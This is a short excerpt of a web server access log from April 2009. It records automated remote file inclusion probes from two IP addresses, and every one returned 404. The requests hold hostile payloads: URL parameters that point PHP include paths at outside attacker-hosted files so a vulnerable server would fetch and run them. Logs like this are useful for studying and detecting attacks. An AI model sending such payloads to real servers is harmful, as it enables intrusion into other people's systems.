72.55.179.176 - - [17/Apr/2009:00:27:01 -0500] "GET /errors.php?error=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.55.179.176 - - [17/Apr/2009:00:27:01 -0500] "GET /logs/errors.php?error=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.55.179.176 - - [17/Apr/2009:00:27:01 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.55.179.176 - - [17/Apr/2009:00:27:37 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://brandon420.justfree.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.201.183.18 - - [17/Apr/2009:00:30:58 -0500] "GET /logs/includes/db_connect.php?baseDir=http://www.depobank.ru/web/3/34/id-owned.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
200.201.183.18 - - [17/Apr/2009:00:30:59 -0500] "GET /includes/db_connect.php?baseDir=http://www.depobank.ru/web/3/34/id-owned.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
